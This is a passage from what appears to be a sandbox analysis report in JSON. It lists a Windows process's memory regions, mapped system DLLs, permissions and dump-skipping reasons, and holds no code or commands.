"\\Windows\\System32\\locale.nls", "id": "region_2305", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 1114112, "timestamp": "00:01:21.579", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 4325376, "type": "region", "version": 1 }, "end_va": 5373951, "entry_point": 0, "filename": null, "id": "region_2306", "name": "private_0x0000000000420000", "norm_filename": null, "region_type": "private_memory", "start_va": 4325376, "timestamp": "00:01:21.579", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 8192000, "type": "region", "version": 1 }, "end_va": 8257535, "entry_point": 0, "filename": null, "id": "region_2307", "name": "private_0x00000000007d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 8192000, "timestamp": "00:01:21.579", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 962560, "start_va": 1786445824, "type": "region", "version": 1 }, "end_va": 1787408383, "entry_point": 1786450894, "filename": "\\Windows\\SysWOW64\\dbghelp.dll", "id": "region_2308", "name": "dbghelp.dll", "norm_filename": "c:\\windows\\syswow64\\dbghelp.dll", "region_type": "memory_mapped_file", "start_va": 1786445824, "timestamp": "00:01:21.579", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 217088, "start_va": 1788411904, "type": "region", "version": 1 }, "end_va": 1788628991, "entry_point": 1788416981, "filename": "\\Windows\\SysWOW64\\framedynos.dll", "id": "region_2309", "name": "framedynos.dll", "norm_filename": "c:\\windows\\syswow64\\framedynos.dll", "region_type": "memory_mapped_file", "start_va": 1788411904, "timestamp": "00:01:21.579", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 1788674048, "type": "region", "version": 1 }, "end_va": 1788735487, "entry_point": 1788678817, "filename": "\\Windows\\SysWOW64\\wkscli.dll", "id": "region_2310", "name": "wkscli.dll", "norm_filename": "c:\\windows\\syswow64\\wkscli.dll", "region_type": "memory_mapped_file", "start_va": 1788674048, "timestamp": "00:01:21.580", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 69632, "start_va": 1788739584, "type": "region", "version": 1 }, "end_va": 1788809215, "entry_point": 1788744448, "filename": "\\Windows\\SysWOW64\\netapi32.dll", "id": "region_2311", "name": "netapi32.dll", "norm_filename": "c:\\windows\\syswow64\\netapi32.dll", "region_type": "memory_mapped_file", "start_va": 1788739584, "timestamp": "00:01:21.580", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 53248, "start_va": 1788870656, "type": "region", "version": 1 }, "end_va": 1788923903, "entry_point": 1788875232, "filename": "\\Windows\\SysWOW64\\wtsapi32.dll", "id": "region_2312", "name": "wtsapi32.dll", "norm_filename": "c:\\windows\\syswow64\\wtsapi32.dll", "region_type": "memory_mapped_file", "start_va": 1788870656, "timestamp": "00:01:21.581", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 73728, "start_va": 1941569536, "type": "region", "version": 1 }, "end_va": 1941643263, "entry_point": 1941574144, "filename": "\\Windows\\SysWOW64\\mpr.dll", "id": "region_2313", "name": "mpr.dll", "norm_filename": "c:\\windows\\syswow64\\mpr.dll", "region_type": "memory_mapped_file", "start_va": 1941569536, "timestamp": "00:01:21.581", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 36864, "start_va": 1944256512, "type": "region", "version": 1 }, "end_va": 1944293375, "entry_point": 1944262054, "filename": "\\Windows\\SysWOW64\\netutils.dll", "id": "region_2314", "name": "netutils.dll", "norm_filename": "c:\\windows\\syswow64\\netutils.dll", "region_type": "memory_mapped_file", "start_va": 1944256512, "timestamp": "00:01:21.582", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1946681344, "type": "region", "version": 1 }, "end_va": 1946714111, "entry_point": 1946685673, "filename": "\\Windows\\SysWOW64\\secur32.dll", "id": "region_2315", "name": "secur32.dll", "norm_filename": "c:\\windows\\syswow64\\secur32.dll", "region_type": "memory_mapped_file", "start_va": 1946681344, "timestamp": "00:01:21.582", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 36864, "start_va": 1958019072, "type": "region", "version": 1 }, "end_va": 1958055935, "entry_point": 1958023712, "filename": "\\Windows\\SysWOW64\\version.dll", "id": "region_2316", "name": "version.dll", "norm_filename": "c:\\windows\\syswow64\\version.dll", "region_type": "memory_mapped_file", "start_va": 1958019072, "timestamp": "00:01:21.583", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1966276608, "type": "region", "version": 1 }, "end_va": 1966379007, "entry_point": 1966281497, "filename": "\\Windows\\SysWOW64\\srvcli.dll", "id": "region_2317", "name": "srvcli.dll", "norm_filename": "c:\\windows\\syswow64\\srvcli.dll", "region_type": "memory_mapped_file", "start_va": 1966276608, "timestamp": "00:01:21.583", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1967063040, "type": "region", "version": 1 }, "end_va": 1967112191, "entry_point": 1967067361, "filename": "\\Windows\\SysWOW64\\cryptbase.dll", "id": "region_2318", "name": "cryptbase.dll", "norm_filename": "c:\\windows\\syswow64\\cryptbase.dll", "region_type": "memory_mapped_file", "start_va": 1967063040, "timestamp": "00:01:21.584", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1967128576, "type": "region", "version": 1 }, "end_va": 1967521791, "entry_point": 1967236019, "filename": "\\Windows\\SysWOW64\\sspicli.dll", "id": "region_2319", "name": "sspicli.dll", "norm_filename": "c:\\windows\\syswow64\\sspicli.dll", "region_type": "memory_mapped_file", "start_va": 1967128576, "timestamp": "00:01:21.584", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 704512, "start_va": 1968832512, "type": "region", "version": 1 }, "end_va": 1969537023, "entry_point": 1968874610, "filename": "\\Windows\\SysWOW64\\msvcrt.dll", "id": "region_2320", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\syswow64\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 1968832512, "timestamp": "00:01:21.585", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 655360, "start_va": 1983840256, "type": "region", "version": 1 }, "end_va": 1984495615, "entry_point": 1983924709, "filename": "\\Windows\\SysWOW64\\advapi32.dll", "id": "region_2321", "name": "advapi32.dll", "norm_filename": "c:\\windows\\syswow64\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 1983840256, "timestamp": "00:01:21.585", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1114112, "start_va": 1985085440, "type": "region", "version": 1 }, "end_va": 1986199551, "entry_point": 1985163987, "filename": "\\Windows\\SysWOW64\\kernel32.dll", "id": "region_2322", "name": "kernel32.dll", "norm_filename": "c:\\windows\\syswow64\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1985085440, "timestamp": "00:01:21.586", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 983040, "start_va": 1986592768, "type": "region", "version": 1 }, "end_va": 1987575807, "entry_point": 1986659689, "filename": "\\Windows\\SysWOW64\\rpcrt4.dll", "id": "region_2323", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\syswow64\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 1986592768, "timestamp": "00:01:21.587", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 356352, "start_va": 1987575808, "type": "region", "version": 1 }, "end_va": 1987932159, "entry_point": 1987681190, "filename": "\\Windows\\SysWOW64\\shlwapi.dll", "id": "region_2324", "name": "shlwapi.dll", "norm_filename": "c:\\windows\\syswow64\\shlwapi.dll", "region_type": "memory_mapped_file", "start_va": 1987575808, "timestamp": "00:01:21.587", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 585728, "start_va": 1989214208, "type": "region", "version": 1 }, "end_va": 1989799935, "entry_point": 1989230513, "filename": "\\Windows\\SysWOW64\\oleaut32.dll", "id": "region_2325", "name": "oleaut32.dll", "norm_filename": "c:\\windows\\syswow64\\oleaut32.dll", "region_type": "memory_mapped_file", "start_va": 1989214208, "timestamp": "00:01:21.588", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1989804032, "type": "region", "version": 1 }, "end_va": 1989906431, "entry_point": 1989822837, "filename": "\\Windows\\SysWOW64\\sechost.dll", "id": "region_2326", "name": "sechost.dll", "norm_filename": "c:\\windows\\syswow64\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 1989804032, "timestamp": "00:01:21.588", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 24576, "start_va": 1992818688, "type": "region", "version": 1 }, "end_va": 1992843263, "entry_point": 1992824706, "filename": "\\Windows\\SysWOW64\\nsi.dll", "id": "region_2327", "name": "nsi.dll", "norm_filename": "c:\\windows\\syswow64\\nsi.dll", "region_type": "memory_mapped_file", "start_va": 1992818688, "timestamp": "00:01:21.589", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 643072, "start_va": 1992884224, "type": "region", "version": 1 }, "end_va": 1993527295, "entry_point": 1993097175, "filename": "\\Windows\\SysWOW64\\usp10.dll", "id": "region_2328", "name": "usp10.dll", "norm_filename": "c:\\windows\\syswow64\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 1992884224, "timestamp": "00:01:21.589", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1425408, "start_va": 1993539584, "type": "region", "version": 1 }, "end_va": 1994964991, "entry_point": 1993849405, "filename": "\\Windows\\SysWOW64\\ole32.dll", "id": "region_2329", "name": "ole32.dll", "norm_filename": "c:\\windows\\syswow64\\ole32.dll", "region_type": "memory_mapped_file", "start_va": 1993539584, "timestamp": "00:01:21.590", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1995046912, "type": "region", "version": 1 }, "end_va": 1995087871, "entry_point": 1995060896, "filename": "\\Windows\\SysWOW64\\lpk.dll", "id": "region_2330", "name": "lpk.dll", "norm_filename": "c:\\windows\\syswow64\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 1995046912, "timestamp": "00:01:21.590", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 217088, "start_va": 1997733888, "type": "region", "version": 1 }, "end_va": 1997950975, "entry_point": 1997739101, "filename": "\\Windows\\SysWOW64\\ws2_32.dll", "id": "region_2331", "name": "ws2_32.dll", "norm_filename": "c:\\windows\\syswow64\\ws2_32.dll", "region_type": "memory_mapped_file", "start_va": 1997733888, "timestamp": "00:01:21.590", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 286720, "start_va": 1999372288, "type": "region", "version": 1 }, "end_va": 1999659007, "entry_point": 1999402104, "filename": "\\Windows\\SysWOW64\\KernelBase.dll", "id": "region_2332", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\syswow64\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 1999372288, "timestamp": "00:01:21.591", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1048576, "start_va": 1999699968, "type": "region", "version": 1 }, "end_va": 2000748543, "entry_point": 1999812333, "filename": "\\Windows\\SysWOW64\\user32.dll", "id": "region_2333", "name": "user32.dll", "norm_filename": "c:\\windows\\syswow64\\user32.dll", "region_type": "memory_mapped_file", "start_va": 1999699968, "timestamp": "00:01:21.591", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 589824, "start_va": 2000748544, "type": "region", "version": 1 }, "end_va": 2001338367, "entry_point": 2000839491, "filename": "\\Windows\\SysWOW64\\gdi32.dll", "id": "region_2334", "name": "gdi32.dll", "norm_filename": "c:\\windows\\syswow64\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 2000748544, "timestamp": "00:01:21.592", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2131623935, "entry_point": 0, "filename": null, "id": "region_2335", "name": "pagefile_0x000000007efe0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130575360, "timestamp": "00:01:21.592", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 15728640, "start_va": 2131623936, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_2336", "name": "private_0x000000007f0e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2131623936, "timestamp": "00:01:21.593", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1605632, "start_va": 8257536, "type": "region", "version": 1 }, "end_va": 9863167, "entry_point": 0, "filename": null, "id": "region_2337", "name": "pagefile_0x00000000007e0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 8257536, "timestamp": "00:01:21.600", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1987969024, "type": "region", "version": 1 }, "end_va": 1988362239, "entry_point": 1988040079, "filename": "\\Windows\\SysWOW64\\imm32.dll", "id": "region_2338", "name": "imm32.dll", "norm_filename": "c:\\windows\\syswow64\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 1987969024, "timestamp": "00:01:21.600", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 835584, "start_va": 1998520320, "type": "region", "version": 1 }, "end_va": 1999355903, "entry_point": 1998526091, "filename": "\\Windows\\SysWOW64\\msctf.dll", "id": "region_2339", "name": "msctf.dll", "norm_filename": "c:\\windows\\syswow64\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 1998520320, "timestamp": "00:01:21.601", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 225279, "entry_point": 0, "filename": null, "id": "region_2340", "name": "pagefile_0x0000000000030000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 196608, "timestamp": "00:01:21.710", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 458752, "type": "region", "version": 1 }, "end_va": 466943, "entry_point": 0, "filename": null, "id": "region_2341", "name": "pagefile_0x0000000000070000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 458752, "timestamp": "00:01:21.710", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 16384, "start_va": 524288, "type": "region", "version": 1 }, "end_va": 540671, "entry_point": 524288, "filename": "\\Windows\\SysWOW64\\en-US\\taskkill.exe.mui", "id": "region_2342", "name": "taskkill.exe.mui", "norm_filename": "c:\\windows\\syswow64\\en-us\\taskkill.exe.mui", "region_type": "memory_mapped_file", "start_va": 524288, "timestamp": "00:01:21.710", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 589824, "type": "region", "version": 1 }, "end_va": 593919, "entry_point": 0, "filename": null, "id": "region_2343", "name": "private_0x0000000000090000", "norm_filename": null, "region_type": "private_memory", "start_va": 589824, "timestamp": "00:01:21.710", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 655360, "type": "region", "version": 1 }, "end_va": 659455, "entry_point": 0, "filename": null, "id": "region_2344", "name": "private_0x00000000000a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 655360, "timestamp": "00:01:21.710", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 720896, "type": "region", "version": 1 }, "end_va": 724991, "entry_point": 0, "filename": null, "id": "region_2345", "name": "pagefile_0x00000000000b0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 720896, "timestamp": "00:01:21.710", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 3670016, "type": "region", "version": 1 }, "end_va": 3932159, "entry_point": 0, "filename": null, "id": "region_2346", "name": "private_0x0000000000380000", "norm_filename": null, "region_type": "private_memory", "start_va": 3670016, "timestamp": "00:01:21.710", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 786432, "start_va": 5373952, "type": "region", "version": 1 }, "end_va": 6160383, "entry_point": 5373952, "filename": "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui", "id": "region_2347", "name": "kernelbase.dll.mui", "norm_filename": "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui", "region_type": "memory_mapped_file", "start_va": 5373952, "timestamp": "00:01:21.711", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 7340032, "type": "region", "version": 1 }, "end_va": 7602175, "entry_point": 0, "filename": null, "id": "region_2348", "name": "private_0x0000000000700000", "norm_filename": null, "region_type": "private_memory", "start_va": 7340032, "timestamp": "00:01:21.711", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1576960, "start_va": 9895936, "type": "region", "version": 1 }, "end_va": 11472895, "entry_point": 0, "filename": null, "id": "region_2349", "name": "pagefile_0x0000000000970000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 9895936, "timestamp": "00:01:21.711", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 20971520, "start_va": 11534336, "type": "region", "version": 1 }, "end_va": 32505855, "entry_point": 0, "filename": null, "id": "region_2350", "name": "pagefile_0x0000000000b00000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 11534336, "timestamp": "00:01:21.712", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 33816576, "type": "region", "version": 1 }, "end_va": 34078719, "entry_point": 0, "filename": null, "id": "region_2351", "name": "private_0x0000000002040000", "norm_filename": null, "region_type": "private_memory", "start_va": 33816576, "timestamp": "00:01:21.712", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 536576, "start_va": 1984495616, "type": "region", "version": 1 }, "end_va": 1985032191, "entry_point": 1984504786, "filename": "\\Windows\\SysWOW64\\clbcatq.dll", "id": "region_2352", "name": "clbcatq.dll", "norm_filename": "c:\\windows\\syswow64\\clbcatq.dll", "region_type": "memory_mapped_file", "start_va": 1984495616, "timestamp": "00:01:21.712", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130542592, "type": "region", "version": 1 }, "end_va": 2130554879, "entry_point": 0, "filename": null, "id": "region_2353", "name": "private_0x000000007efd8000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130542592, "timestamp": "00:01:21.712", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 786432, "type": "region", "version": 1 }, "end_va": 790527, "entry_point": 0, "filename": null, "id": "region_2354", "name": "pagefile_0x00000000000c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 786432, "timestamp": "00:01:21.717", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 376832, "start_va": 1787953152, "type": "region", "version": 1 }, "end_va": 1788329983, "entry_point": 1788095304, "filename": "\\Windows\\SysWOW64\\wbemcomn.dll", "id": "region_2355", "name": "wbemcomn.dll", "norm_filename": "c:\\windows\\syswow64\\wbemcomn.dll", "region_type": "memory_mapped_file", "start_va": 1787953152, "timestamp": "00:01:21.717", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1788346368, "type": "region", "version": 1 }, "end_va": 1788387327, "entry_point": 1788351642, "filename": "\\Windows\\SysWOW64\\wbem\\wbemprox.dll", "id": "region_2356", "name": "wbemprox.dll", "norm_filename": "c:\\windows\\syswow64\\wbem\\wbemprox.dll", "region_type": "memory_mapped_file", "start_va": 1788346368, "timestamp": "00:01:21.717", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 32964608, "type": "region", "version": 1 }, "end_va": 33226751, "entry_point": 0, "filename": null, "id": "region_2357", "name": "private_0x0000000001f70000", "norm_filename": null, "region_type": "private_memory", "start_va": 32964608, "timestamp": "00:01:21.720", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 34078720, "type": "region", "version": 1 }, "end_va": 35127295, "entry_point": 0, "filename": null, "id": "region_2358", "name": "private_0x0000000002080000", "norm_filename": null, "region_type": "private_memory", "start_va": 34078720, "timestamp": "00:01:21.720", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 167936, "start_va": 1787756544, "type": "region", "version": 1 }, "end_va": 1787924479, "entry_point": 1787783961, "filename": "\\Windows\\SysWOW64\\winsta.dll", "id": "region_2359", "name": "winsta.dll", "norm_filename": "c:\\windows\\syswow64\\winsta.dll", "region_type": "memory_mapped_file", "start_va": 1787756544, "timestamp": "00:01:21.720", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 1572864, "type": "region", "version": 1 }, "end_va": 1835007, "entry_point": 0, "filename": null, "id": "region_2360", "name": "private_0x0000000000180000", "norm_filename": null, "region_type": "private_memory", "start_va": 1572864, "timestamp": "00:01:21.733", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 6225920, "type": "region", "version": 1 }, "end_va": 6488063, "entry_point": 0, "filename": null, "id": "region_2361", "name": "private_0x00000000005f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 6225920, "timestamp": "00:01:21.733", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 35127296, "type": "region", "version": 1 }, "end_va": 38072319, "entry_point": 35127296, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_2362", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 35127296, "timestamp": "00:01:21.733", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 241664, "start_va": 1950744576, "type": "region", "version": 1 }, "end_va": 1950986239, "entry_point": 1950749325, "filename": "\\Windows\\SysWOW64\\rsaenh.dll", "id": "region_2363", "name": "rsaenh.dll", "norm_filename": "c:\\windows\\syswow64\\rsaenh.dll", "region_type": "memory_mapped_file", "start_va": 1950744576, "timestamp": "00:01:21.733", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 90112, "start_va": 1956511744, "type": "region", "version": 1 }, "end_va": 1956601855, "entry_point": 1956523459, "filename": "\\Windows\\SysWOW64\\cryptsp.dll", "id": "region_2364", "name": "cryptsp.dll", "norm_filename": "c:\\windows\\syswow64\\cryptsp.dll", "region_type": "memory_mapped_file", "start_va": 1956511744, "timestamp": "00:01:21.734", "type": "region", "version": 1 }, { "dump": 